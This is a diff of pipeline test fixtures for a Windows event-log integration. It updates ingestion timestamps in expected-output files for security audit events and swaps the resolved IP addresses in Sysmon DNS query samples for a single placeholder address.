--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4726-account-deleted.json-expected.json
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4726-account-deleted.json-expected.json
@@ -63,7 +63,7 @@
 "name": "WIN-41OB2LO92CR"
 },
 "event": {
- "ingested": "2021-06-14T13:22:47.917265300Z",
+ "ingested": "2021-12-09T13:49:36.838300Z",
 "code": "4726",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -146,7 +146,7 @@
 "name": "WIN-41OB2LO92CR"
 },
 "event": {
- "ingested": "2021-06-14T13:22:47.917272800Z",
+ "ingested": "2021-12-09T13:49:36.838309800Z",
 "code": "4726",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4727.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4727.json-expected.json
index c4d6035b082..cdc51d42674 100644
--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4727.json-expected.json
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4727.json-expected.json
@@ -63,7 +63,7 @@
 "name": "WIN-41OB2LO92CR.wlbeat.local"
 },
 "event": {
- "ingested": "2021-06-14T13:22:48.193779Z",
+ "ingested": "2021-12-09T13:49:37.304052Z",
 "code": "4727",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4728.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4728.json-expected.json
index 6587fc4cd5a..60d2c7f6d1b 100644
--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4728.json-expected.json
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4728.json-expected.json
@@ -63,7 +63,7 @@
 "name": "WIN-41OB2LO92CR.wlbeat.local"
 },
 "event": {
- "ingested": "2021-06-14T13:22:48.343331400Z",
+ "ingested": "2021-12-09T13:49:37.546890900Z",
 "code": "4728",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4729.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4729.json-expected.json
index ee7ad81b7d2..ec94b2603cb 100644
--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4729.json-expected.json
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4729.json-expected.json
@@ -63,7 +63,7 @@
 "name": "WIN-41OB2LO92CR.wlbeat.local"
 },
 "event": {
- "ingested": "2021-06-14T13:22:48.497223Z",
+ "ingested": "2021-12-09T13:49:37.850981400Z",
 "code": "4729",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4730.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4730.json-expected.json
index ef2313ae419..1ae7b06e189 100644
--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4730.json-expected.json
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4730.json-expected.json
@@ -61,7 +61,7 @@
 "name": "WIN-41OB2LO92CR.wlbeat.local"
 },
 "event": {
- "ingested": "2021-06-14T13:22:48.663842200Z",
+ "ingested": "2021-12-09T13:49:38.159840600Z",
 "code": "4730",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4731.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4731.json-expected.json
index 14460343e9f..c1ccdff1d35 100644
--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4731.json-expected.json
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4731.json-expected.json
@@ -63,7 +63,7 @@
 "name": "WIN-41OB2LO92CR.wlbeat.local"
 },
 "event": {
- "ingested": "2021-06-14T13:22:48.801831400Z",
+ "ingested": "2021-12-09T13:49:38.413708300Z",
 "code": "4731",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4732.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4732.json-expected.json
index 952e4e6f9e0..5557cd7ceea 100644
--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4732.json-expected.json
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4732.json-expected.json
@@ -63,7 +63,7 @@
 "name": "WIN-41OB2LO92CR.wlbeat.local"
 },
 "event": {
- "ingested": "2021-06-14T13:22:48.956312700Z",
+ "ingested": "2021-12-09T13:49:38.657225700Z",
 "code": "4732",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4733.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4733.json-expected.json
index d493ff52571..a8df2107b98 100644
--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4733.json-expected.json
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4733.json-expected.json
@@ -63,7 +63,7 @@
 "name": "WIN-41OB2LO92CR.wlbeat.local"
 },
 "event": {
- "ingested": "2021-06-14T13:22:49.117726500Z",
+ "ingested": "2021-12-09T13:49:38.961223300Z",
 "code": "4733",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4734.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4734.json-expected.json
index 98eb2d7ec7c..11fc4c38c09 100644
--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4734.json-expected.json
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4734.json-expected.json
@@ -61,7 +61,7 @@
 "name": "WIN-41OB2LO92CR.wlbeat.local"
 },
 "event": {
- "ingested": "2021-06-14T13:22:49.284818500Z",
+ "ingested": "2021-12-09T13:49:39.271630500Z",
 "code": "4734",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4735.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4735.json-expected.json
index 4dc5565dd02..a746ab6c0b4 100644
--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4735.json-expected.json
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4735.json-expected.json
@@ -63,7 +63,7 @@
 "name": "WIN-41OB2LO92CR.wlbeat.local"
 },
 "event": {
- "ingested": "2021-06-14T13:22:49.425635700Z",
+ "ingested": "2021-12-09T13:49:39.528673800Z",
 "code": "4735",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4737.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4737.json-expected.json
index bf22704b42b..c9323846631 100644
--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4737.json-expected.json
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4737.json-expected.json
@@ -63,7 +63,7 @@
 "name": "WIN-41OB2LO92CR.wlbeat.local"
 },
 "event": {
- "ingested": "2021-06-14T13:22:49.563295200Z",
+ "ingested": "2021-12-09T13:49:39.770336100Z",
 "code": "4737",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4738-account-changed.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4738-account-changed.json-expected.json
index 917b30240fb..fd844d3adee 100644
--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4738-account-changed.json-expected.json
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4738-account-changed.json-expected.json
@@ -88,7 +88,7 @@
 "name": "WIN-41OB2LO92CR"
 },
 "event": {
- "ingested": "2021-06-14T13:22:49.714606400Z",
+ "ingested": "2021-12-09T13:49:40.027237800Z",
 "code": "4738",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4740-account-locked-out.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4740-account-locked-out.json-expected.json
index 96f7811a28f..d8ef5861ef4 100644
--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4740-account-locked-out.json-expected.json
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4740-account-locked-out.json-expected.json
@@ -62,7 +62,7 @@
 "name": "WIN-41OB2LO92CR"
 },
 "event": {
- "ingested": "2021-06-14T13:22:49.923875300Z",
+ "ingested": "2021-12-09T13:49:40.323281100Z",
 "code": "4740",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4754.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4754.json-expected.json
index 56672b83791..b06b22e2730 100644
--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4754.json-expected.json
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4754.json-expected.json
@@ -63,7 +63,7 @@
 "name": "WIN-41OB2LO92CR.wlbeat.local"
 },
 "event": {
- "ingested": "2021-06-14T13:22:50.068119900Z",
+ "ingested": "2021-12-09T13:49:40.567987900Z",
 "code": "4754",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4755.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4755.json-expected.json
index dbf34c4d7ad..2d88445d368 100644
--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4755.json-expected.json
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4755.json-expected.json
@@ -63,7 +63,7 @@
 "name": "WIN-41OB2LO92CR.wlbeat.local"
 },
 "event": {
- "ingested": "2021-06-14T13:22:50.213326800Z",
+ "ingested": "2021-12-09T13:49:40.817070400Z",
 "code": "4755",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4756.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4756.json-expected.json
index 4beccbcd2ed..640103b5409 100644
--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4756.json-expected.json
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4756.json-expected.json
@@ -63,7 +63,7 @@
 "name": "WIN-41OB2LO92CR.wlbeat.local"
 },
 "event": {
- "ingested": "2021-06-14T13:22:50.360935Z",
+ "ingested": "2021-12-09T13:49:41.069731Z",
 "code": "4756",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4757.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4757.json-expected.json
index ca2a49daf00..656d9ca9871 100644
--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4757.json-expected.json
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4757.json-expected.json
@@ -63,7 +63,7 @@
 "name": "WIN-41OB2LO92CR.wlbeat.local"
 },
 "event": {
- "ingested": "2021-06-14T13:22:50.518610900Z",
+ "ingested": "2021-12-09T13:49:41.372534300Z",
 "code": "4757",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4758.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4758.json-expected.json
index 8fe35481546..df35aa344d8 100644
--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4758.json-expected.json
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4758.json-expected.json
@@ -61,7 +61,7 @@
 "name": "WIN-41OB2LO92CR.wlbeat.local"
 },
 "event": {
- "ingested": "2021-06-14T13:22:50.667565900Z",
+ "ingested": "2021-12-09T13:49:41.673374400Z",
 "code": "4758",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4764.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4764.json-expected.json
index e6cd34447df..0fda5525911 100644
--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4764.json-expected.json
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4764.json-expected.json
@@ -62,7 +62,7 @@
 "name": "WIN-41OB2LO92CR.wlbeat.local"
 },
 "event": {
- "ingested": "2021-06-14T13:22:50.809818300Z",
+ "ingested": "2021-12-09T13:49:41.921403400Z",
 "code": "4764",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4767-account-unlocked.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4767-account-unlocked.json-expected.json
index 167346cc8a7..d85f32ed13b 100644
--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4767-account-unlocked.json-expected.json
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4767-account-unlocked.json-expected.json
@@ -62,7 +62,7 @@
 "name": "WIN-41OB2LO92CR"
 },
 "event": {
- "ingested": "2021-06-14T13:22:50.950740300Z",
+ "ingested": "2021-12-09T13:49:42.169954Z",
 "code": "4767",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4781-account-renamed.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4781-account-renamed.json-expected.json
index c2a9cb5757a..fd1af6c3fee 100644
--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4781-account-renamed.json-expected.json
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4781-account-renamed.json-expected.json
@@ -65,7 +65,7 @@
 "name": "WIN-41OB2LO92CR"
 },
 "event": {
- "ingested": "2021-06-14T13:22:51.084922400Z",
+ "ingested": "2021-12-09T13:49:42.400276500Z",
 "code": "4781",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -150,7 +150,7 @@
 "name": "WIN-41OB2LO92CR"
 },
 "event": {
- "ingested": "2021-06-14T13:22:51.084933Z",
+ "ingested": "2021-12-09T13:49:42.400285800Z",
 "code": "4781",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4798.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4798.json-expected.json
index 36c72262e25..b99ada28223 100644
--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4798.json-expected.json
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4798.json-expected.json
@@ -64,7 +64,7 @@
 "name": "WIN-41OB2LO92CR"
 },
 "event": {
- "ingested": "2021-06-14T13:22:51.354317300Z",
+ "ingested": "2021-12-09T13:49:42.839726300Z",
 "code": "4798",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4799.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4799.json-expected.json
index 0064068e428..fe8937f10c7 100644
--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4799.json-expected.json
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4799.json-expected.json
@@ -63,7 +63,7 @@
 "name": "WIN-41OB2LO92CR"
 },
 "event": {
- "ingested": "2021-06-14T13:22:51.499131100Z",
+ "ingested": "2021-12-09T13:49:43.082123200Z",
 "code": "4799",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-logoff.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-logoff.json-expected.json
index 2c3812b5d9f..78ef3144b4a 100644
--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-logoff.json-expected.json
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-logoff.json-expected.json
@@ -59,7 +59,7 @@
 "name": "WIN-41OB2LO92CR"
 },
 "event": {
- "ingested": "2021-06-14T13:22:51.649489800Z",
+ "ingested": "2021-12-09T13:49:43.331307500Z",
 "code": "4634",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -137,7 +137,7 @@
 "name": "WIN-41OB2LO92CR"
 },
 "event": {
- "ingested": "2021-06-14T13:22:51.649500500Z",
+ "ingested": "2021-12-09T13:49:43.331316200Z",
 "code": "4634",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2019-4688-process-created.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2019-4688-process-created.json-expected.json
index 7462aba921b..1797de90fad 100644
--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2019-4688-process-created.json-expected.json
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2019-4688-process-created.json-expected.json
@@ -81,7 +81,7 @@
 "name": "vagrant"
 },
 "event": {
- "ingested": "2021-06-14T13:22:51.902408900Z",
+ "ingested": "2021-12-09T13:49:43.741075500Z",
 "code": "4688",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2019-4689-process-exited.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2019-4689-process-exited.json-expected.json
index 40ab95488c6..1eee58e1c15 100644
--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2019-4689-process-exited.json-expected.json
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2019-4689-process-exited.json-expected.json
@@ -63,7 +63,7 @@
 "name": "vagrant"
 },
 "event": {
- "ingested": "2021-06-14T13:22:52.077600200Z",
+ "ingested": "2021-12-09T13:49:44.040667200Z",
 "code": "4689",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -145,7 +145,7 @@
 "name": "vagrant"
 },
 "event": {
- "ingested": "2021-06-14T13:22:52.077606900Z",
+ "ingested": "2021-12-09T13:49:44.040672Z",
 "code": "4689",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -227,7 +227,7 @@
 "name": "vagrant"
 },
 "event": {
- "ingested": "2021-06-14T13:22:52.077614Z",
+ "ingested": "2021-12-09T13:49:44.040676600Z",
 "code": "4689",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-sysmon-operational-events.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-sysmon-operational-events.json
index 7cd97636559..6593c087521 100644
--- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-sysmon-operational-events.json
+++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-sysmon-operational-events.json
@@ -51,7 +51,7 @@
 "ProcessGuid": "{00000000-0000-0000-0000-000000000000}",
 "ProcessId": "6968",
 "QueryName": "enterpriseregistration.windows.net",
- "QueryResults": "type: 5 adrs.privatelink.msidentity.com;type: 5 www.tm.prd.adrs.akadns.net;::ffff:20.190.129.168;",
+ "QueryResults": "type: 5 adrs.privatelink.msidentity.com;type: 5 www.tm.prd.adrs.akadns.net;::ffff:89.160.20.156;",
 "QueryStatus": "0",
 "RuleName": "-",
 "UtcTime": "2021-09-14 09:01:34.006"
@@ -90,7 +90,7 @@
 "ProcessId": "356",
 "QueryName": "go.microsoft.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 go.microsoft.com.edgekey.net;type: 5 e11290.dspg.akamaiedge.net;::ffff:23.223.14.67;",
+ "QueryResults": "type: 5 go.microsoft.com.edgekey.net;type: 5 e11290.dspg.akamaiedge.net;::ffff:89.160.20.156;",
 "Image": "C:\\Program Files\\Internet Explorer\\iexplore.exe"
 },
 "provider_name": "Microsoft-Windows-Sysmon",
@@ -108,7 +108,7 @@ } }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025223900Z'/\u003e\u003cEventRecordID\u003e66\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.239\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ego.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 go.microsoft.com.edgekey.net;type: 5 e11290.dspg.akamaiedge.net;::ffff:23.223.14.67;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025223900Z'/\u003e\u003cEventRecordID\u003e66\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.239\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ego.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 go.microsoft.com.edgekey.net;type: 5 e11290.dspg.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" @@ -133,7 +133,7 @@ "event_data": { "QueryName": "www.msn.com", "QueryStatus": "0", - "QueryResults": "type: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:204.79.197.203;", + "QueryResults": "type: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:01.261", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -148,7 +148,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025237700Z'/\u003e\u003cEventRecordID\u003e67\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.261\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:204.79.197.203;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025237700Z'/\u003e\u003cEventRecordID\u003e67\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.261\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" } 
